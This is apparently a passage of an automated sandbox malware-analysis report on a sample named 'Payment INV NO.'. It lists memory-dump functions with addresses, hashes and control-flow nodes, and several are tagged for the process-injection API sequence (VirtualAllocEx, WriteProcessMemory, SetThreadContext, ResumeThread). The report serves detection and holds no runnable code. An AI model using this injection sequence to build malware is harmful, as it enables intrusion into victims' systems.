                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 0a0812da24af32832d2ab88cd8c42ce56e6acdb5639603eddf23baf62712900a
                                                          • Instruction ID: 52736d8e388b52e7580cb6188fb38410cf2352b042c0d4082097093f401c849c
                                                          • Opcode Fuzzy Hash: 0a0812da24af32832d2ab88cd8c42ce56e6acdb5639603eddf23baf62712900a
                                                          • Instruction Fuzzy Hash: 5D3122B1D002499FDB98CFA9C88579EBFF1FF08714F14852AE815AB280D7B49585CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06012810 Relevance: 1.6, APIs: 1, Instructions: 86libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 451 6012810-6012867 452 60128a0-60128ea LoadLibraryA 451->452 453 6012869-6012873 451->453 460 60128f3-6012924 452->460 461 60128ec-60128f2 452->461 453->452 454 6012875-6012877 453->454 455 6012879-6012883 454->455 456 601289a-601289d 454->456 458 6012885 455->458 459 6012887-6012896 455->459 456->452 458->459 459->459 463 6012898 459->463 465 6012934 460->465 466 6012926-601292a 460->466 461->460 463->456 468 6012935 465->468 466->465 467 601292c 466->467 467->465 468->468
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: ce3e80acf029fcf8e0723a0fd52655c001e50914d986762bbd4326924c1d4bef
                                                          • Instruction ID: afc10c55810a361888665dcee446e768caa587fd853e7dfce14bf7cc1cc778b6
                                                          • Opcode Fuzzy Hash: ce3e80acf029fcf8e0723a0fd52655c001e50914d986762bbd4326924c1d4bef
                                                          • Instruction Fuzzy Hash: 0C3133B0D002498FDB94CFA9C88479EBFF1FF08714F14852AE815AB280D7B49585CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601A660 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1040 601a660-601a6b6 1043 601a6c6-601a705 WriteProcessMemory 1040->1043 1044 601a6b8-601a6c4 1040->1044 1046 601a707-601a70d 1043->1046 1047 601a70e-601a73e 1043->1047 1044->1043 1046->1047
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0601A6F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 56a2bffa0af8c997194af37b16599ab6026a94b5bc68ca73f0247593e08e8cce
                                                          • Instruction ID: 257b7dceb2cca903ea98c15491ac049b8a0dc26aa05ea8fd68be45e955cd8997
                                                          • Opcode Fuzzy Hash: 56a2bffa0af8c997194af37b16599ab6026a94b5bc68ca73f0247593e08e8cce
                                                          • Instruction Fuzzy Hash: B4212A71D003499FCB50CFAAC9847DEBBF5FF48310F50842AE919A7240D7799944DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601A668 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1051 601a668-601a6b6 1053 601a6c6-601a705 WriteProcessMemory 1051->1053 1054 601a6b8-601a6c4 1051->1054 1056 601a707-601a70d 1053->1056 1057 601a70e-601a73e 1053->1057 1054->1053 1056->1057
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0601A6F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: cffe90bddc90288a2b35c3047be52ae353c10eedae5cedcd723631b7da882ca6
                                                          • Instruction ID: 0c4664e6c7aa092c6e28c540e8bfc72592dc61d81d5da2409ffbcf31019bec2c
                                                          • Opcode Fuzzy Hash: cffe90bddc90288a2b35c3047be52ae353c10eedae5cedcd723631b7da882ca6
                                                          • Instruction Fuzzy Hash: 262127B1D003499FCB50CFAAC9847DEBBF5FF48310F50842AE919A7240C7789944DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601AB99 Relevance: 1.6, APIs: 1, Instructions: 66threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1061 601ab99-601abeb 1063 601abfb-601ac2b SetThreadContext 1061->1063 1064 601abed-601abf9 1061->1064 1066 601ac34-601ac64 1063->1066 1067 601ac2d-601ac33 1063->1067 1064->1063 1067->1066
                                                          APIs
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0601AC1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 8c32ccd37d55838e359fe2e2c773ca46065d21f706c4f98ddb9d1cce957e2248
                                                          • Instruction ID: 9197e8f9a279877cba7eb1aa025c9a5e91375d89d777f341c688a23516108610
                                                          • Opcode Fuzzy Hash: 8c32ccd37d55838e359fe2e2c773ca46065d21f706c4f98ddb9d1cce957e2248
                                                          • Instruction Fuzzy Hash: E6213A71D002498FCB50DFAAC5847EEBBF4EF48324F54842AD459AB241C7789945CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601AF62 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1071 601af62-601afee ReadProcessMemory 1073 601aff0-601aff6 1071->1073 1074 601aff7-601b027 1071->1074 1073->1074
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0601AFE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: be662dc5b72f23908dfdeee65b7afaab4154285e2bf1ee58d40d8bcd9b9b51fd
                                                          • Instruction ID: 582aaecf76e1ee0d39f3f98569b8457bb4ea2205392494df8b33ab937d5653ab
                                                          • Opcode Fuzzy Hash: be662dc5b72f23908dfdeee65b7afaab4154285e2bf1ee58d40d8bcd9b9b51fd
                                                          • Instruction Fuzzy Hash: 102128B2D003499FCB00CF9AC884AEEBBF5FF48310F50842AE858A7250C7749944DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601ABA0 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1078 601aba0-601abeb 1080 601abfb-601ac2b SetThreadContext 1078->1080 1081 601abed-601abf9 1078->1081 1083 601ac34-601ac64 1080->1083 1084 601ac2d-601ac33 1080->1084 1081->1080 1084->1083
                                                          APIs
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0601AC1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 01e9a0ff59612b77f4c3185f1fb71917db148193e6ee31a776aa782dd27dee6a
                                                          • Instruction ID: 3d547a5359f9d90577c436a123aca94bb4e3493c951d8a3232fa60d9321d0cbd
                                                          • Opcode Fuzzy Hash: 01e9a0ff59612b77f4c3185f1fb71917db148193e6ee31a776aa782dd27dee6a
                                                          • Instruction Fuzzy Hash: ED212971D003098FCB50DFAAC9847EEBBF5EF48324F54842AD459A7241CB789945CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601AF68 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1088 601af68-601afee ReadProcessMemory 1090 601aff0-601aff6 1088->1090 1091 601aff7-601b027 1088->1091 1090->1091
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0601AFE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: b70272df5c8b66b5fba41197eabbef2f0c7437b38fbfb157b9b08daafdabf832
                                                          • Instruction ID: 21486bd51750d0cf83cd1b4bbafdc34688abf2b4e23fa976e921d37cc537d9a5
                                                          • Opcode Fuzzy Hash: b70272df5c8b66b5fba41197eabbef2f0c7437b38fbfb157b9b08daafdabf832
                                                          • Instruction Fuzzy Hash: 7C21F5B1D003499FCB00CF9AC884AEEBBF5FF48310F50842AE958A7250C7789944DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601A83E Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1095 601a83e-601a8bb VirtualAllocEx 1099 601a8c4-601a8e9 1095->1099 1100 601a8bd-601a8c3 1095->1100 1100->1099
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0601A8AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 2be145ccd448f8deb632d1d4a4d5680a4bd8519edccfd0e9e3e41695661b24e1
                                                          • Instruction ID: f183175e02777be9b40dd3ee28a5b9d688f42ca35d49481951ac9a42d0a7cd00
                                                          • Opcode Fuzzy Hash: 2be145ccd448f8deb632d1d4a4d5680a4bd8519edccfd0e9e3e41695661b24e1
                                                          • Instruction Fuzzy Hash: 79112672D002499FCB10CFAAC8447DEBFF5EF48320F14842AE515A7250C7759945DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0601A840 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1104 601a840-601a8bb VirtualAllocEx 1107 601a8c4-601a8e9 1104->1107 1108 601a8bd-601a8c3 1104->1108 1108->1107
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0601A8AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 5ac116354e204bf6949d6957cec1909386cf9eaa3140bd6e8163e598444d7b7a
                                                          • Instruction ID: 82e4c121f46f1892dc5a05188704e060b0bf72283cb5215629bc45ff976776bc
                                                          • Opcode Fuzzy Hash: 5ac116354e204bf6949d6957cec1909386cf9eaa3140bd6e8163e598444d7b7a
                                                          • Instruction Fuzzy Hash: 6A112672D002499FCB10CFAAC8447DEBFF5EF48320F14842AE515A7250C7759944DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06012AB8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1112 6012ab8-6012aba 1113 6012ac1-6012b2f ResumeThread 1112->1113 1114 6012abc-6012ac0 1112->1114 1118 6012b31-6012b37 1113->1118 1119 6012b38-6012b5d 1113->1119 1114->1113 1118->1119
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: cf95c6ba03b61f1aa1128d3aed8e07b04ddae42e704fd0351711c03cfe8f8ac8
                                                          • Instruction ID: 2cb01e6a1e48b5ba37d65dbdf62f70c40fcc8bc4b2d2af60a78908a91561965a
                                                          • Opcode Fuzzy Hash: cf95c6ba03b61f1aa1128d3aed8e07b04ddae42e704fd0351711c03cfe8f8ac8
                                                          • Instruction Fuzzy Hash: 50111971D003498FCB20DFAAC8847DEBFF4EB48714F548429D555A7640C779A944CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06012AC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 323a190cdb3711cb61f0541723e77faf6c1e88e60c2f36c55a146eb31763ae73
                                                          • Instruction ID: c05d8fb2bc9a70170078247a6c423d83524d7510b59ab8dcbe27e561ea268076
                                                          • Opcode Fuzzy Hash: 323a190cdb3711cb61f0541723e77faf6c1e88e60c2f36c55a146eb31763ae73
                                                          • Instruction Fuzzy Hash: 3411F8B1D003498FCB14DFAAD8847DEBBF5EF88724F14842AD415A7640C779A944CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606DC60 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /
                                                          • API String ID: 0-2043925204
                                                          • Opcode ID: 1467e70bad7b9bbc778b2e4e606a6f0164bd096f0cbabda3f73cffc3bdf63fbc
                                                          • Instruction ID: e4f8311b7e5a5820aea0b99436e3c02c3eb19360b9245d124be98a5fa6128669
                                                          • Opcode Fuzzy Hash: 1467e70bad7b9bbc778b2e4e606a6f0164bd096f0cbabda3f73cffc3bdf63fbc
                                                          • Instruction Fuzzy Hash: 3241B130B502148FEB54BB6AD86872DBFF6EF84710F50896AE4039B2D4DF759C848B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606A320 Relevance: .3, Instructions: 270COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 038dad9ef577493d5e84ee0f7355b68d479d807f4eb19fc42148783d14256548
                                                          • Instruction ID: 461750a62a9ac9b69e67c0b2034ee320dc926bd448647b96343a98400abb8175
                                                          • Opcode Fuzzy Hash: 038dad9ef577493d5e84ee0f7355b68d479d807f4eb19fc42148783d14256548
                                                          • Instruction Fuzzy Hash: 2191E431B54120CFDB94EB7AD81866D7BE2EF8A225B14446AF146E7261DE70EC81CBC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606D998 Relevance: .2, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ffc8af87d3d54c95c9fa5bf063657153b958fd307ab2598caefcbd1f1dd3fca8
                                                          • Instruction ID: db26c03a063a07b8502138424867e7b2e830fe06356be3ee5e181364efdc08fc
                                                          • Opcode Fuzzy Hash: ffc8af87d3d54c95c9fa5bf063657153b958fd307ab2598caefcbd1f1dd3fca8
                                                          • Instruction Fuzzy Hash: DB516270F542159FDF84EBBAE8647AE7AF6EF89604F104126E406E3384DF349C418BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606D6B8 Relevance: .2, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 889cae79a57250e691c2dfe2be75533f1d0684d1c5b279b63278746ec28ed842
                                                          • Instruction ID: f72e2bfe5e38db12dfa7bdda7b89a83c01e13cf7657f633c3178b10231e06ca9
                                                          • Opcode Fuzzy Hash: 889cae79a57250e691c2dfe2be75533f1d0684d1c5b279b63278746ec28ed842
                                                          • Instruction Fuzzy Hash: 9751F430B442049FE790E77A9809B7A7BE69F85304F60C0BAF508CB395EA78DC478791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606C7B0 Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8c05d833092379a1c820ca5bda8206e6fb14888968838aa4280d6491fea5f1a
                                                          • Instruction ID: 1ed01643454a72deeeb75300087d779608e0cbe049518d7262a16c5fca984814
                                                          • Opcode Fuzzy Hash: e8c05d833092379a1c820ca5bda8206e6fb14888968838aa4280d6491fea5f1a
                                                          • Instruction Fuzzy Hash: 9B316E25A01311CFEFC0ABBA84283BC79D69B85646F45817BA085D7291EE3CCE849762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606BB78 Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b75cc81136a16a3f33551cb2f956d36cff24ef5fda91d0f7d705ecd7c596151b
                                                          • Instruction ID: 5c8c031438dfaf597342e3a2bfac3396ce16db22e2cd7a60a963ad3cbaedebb8
                                                          • Opcode Fuzzy Hash: b75cc81136a16a3f33551cb2f956d36cff24ef5fda91d0f7d705ecd7c596151b
                                                          • Instruction Fuzzy Hash: 5531F474B402148FD7A49A7AD86472B7AEAFB88620F205475F10BDB355EF74CC5187A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606C090 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: add79b1c1d484325349d2588c63c63ef70cc24dc302e9aff813bd837b81ced4d
                                                          • Instruction ID: cd98cd47ca0f473b3c2b0b9025251ec0a212b0ee1f873af09d803d3751fbd6ef
                                                          • Opcode Fuzzy Hash: add79b1c1d484325349d2588c63c63ef70cc24dc302e9aff813bd837b81ced4d
                                                          • Instruction Fuzzy Hash: 0231C134B443018FFB94ABBAD11836EBAE6EB85705F00897AE446D7380DE788D858761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606AF80 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e0c5ecd576f80d87252f8e3fc7ad6ecb74c7ef4c67808d7fb0a45733d7240dc
                                                          • Instruction ID: 74d6c7f506bf2f0ac4e66555e7639b9805a12879ad27bb0b076a979500dc8c3c
                                                          • Opcode Fuzzy Hash: 0e0c5ecd576f80d87252f8e3fc7ad6ecb74c7ef4c67808d7fb0a45733d7240dc
                                                          • Instruction Fuzzy Hash: 41319CB0A84308EFEB80FFA5D90976CBFF5EB04304F1085A6E115E7165DB7859848BA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06065C8F Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e6a32b93fa3158a8186da1e59d7eaa965e1c8d6deb5e41c9de5b530e0f28923
                                                          • Instruction ID: 5e3cc7fb23e69be87f812e713920e874c233a3d895444734490c74e4e1b72af7
                                                          • Opcode Fuzzy Hash: 4e6a32b93fa3158a8186da1e59d7eaa965e1c8d6deb5e41c9de5b530e0f28923
                                                          • Instruction Fuzzy Hash: E821E274A84210CFEB94CF25C988A58BBB1FF49315F1580E9E80A9B361DB35ED80CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606FD70 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 690dee1619b6c3e372c2132daee2e3f8d222eb830d2a178ccfa6edbc3ea8fd1b
                                                          • Instruction ID: 963880cbff95e46938fb2232ab8e5c92fd88630028ba730a3088d920e94773dc
                                                          • Opcode Fuzzy Hash: 690dee1619b6c3e372c2132daee2e3f8d222eb830d2a178ccfa6edbc3ea8fd1b
                                                          • Instruction Fuzzy Hash: 4301ED353002029BC758AF2AE4815AEBBE7EBC5350344C93DE19B8B300DF30AC02CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606B188 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5f254f57cc7ae346ccbd58cce6e46dcf9e0ba5f1b660708bc1bb090f6d383f5
                                                          • Instruction ID: 59f2167b10f0442071d1648c746538a79bd988990c22b427927f44aa135c4605
                                                          • Opcode Fuzzy Hash: f5f254f57cc7ae346ccbd58cce6e46dcf9e0ba5f1b660708bc1bb090f6d383f5
                                                          • Instruction Fuzzy Hash: 9601B570699380AFE3526766DC247723FA45B02704F5680F7E249CF297D718EC16C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606BF88 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fbcff4906cda0bc1c4c2c317a29d916e1b35b86a4adba7fc4e8107d7ac4f688
                                                          • Instruction ID: cab05151ba238b18c6782df3b90e89099a59fb49923440f6d514cd600c9b16f0
                                                          • Opcode Fuzzy Hash: 8fbcff4906cda0bc1c4c2c317a29d916e1b35b86a4adba7fc4e8107d7ac4f688
                                                          • Instruction Fuzzy Hash: 94017570F501589BEB189BAA98547AEB9F67FC8740F14402DE006EB390CFB45C458B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606D820 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 112d56ff4365bb897d4c5dfde8deab5def2a62abfcf156107776c871f5a50c72
                                                          • Instruction ID: 853d9dfeb94503ada041a4e4648904c0a4275cf9e3998239b85dc3d25140d272
                                                          • Opcode Fuzzy Hash: 112d56ff4365bb897d4c5dfde8deab5def2a62abfcf156107776c871f5a50c72
                                                          • Instruction Fuzzy Hash: 40F04430E44204DFDB84EFB9D44926CBFF1EF44305F5064AAE405972A0DBB59E81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 060611E0 Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e344a928fbd1ac6fa629b0f9bae4deff83e9d945132391f6521090d5c80bc1f2
                                                          • Instruction ID: a819ef226d040c0cd2ca535938279dac7e6e454d0e2402960ae3f81f5da1c36e
                                                          • Opcode Fuzzy Hash: e344a928fbd1ac6fa629b0f9bae4deff83e9d945132391f6521090d5c80bc1f2
                                                          • Instruction Fuzzy Hash: 1EF0C474984218CFEB65CF55C544BACBBF1BB48314F108195E95AA7361C7359D81CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606B650 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
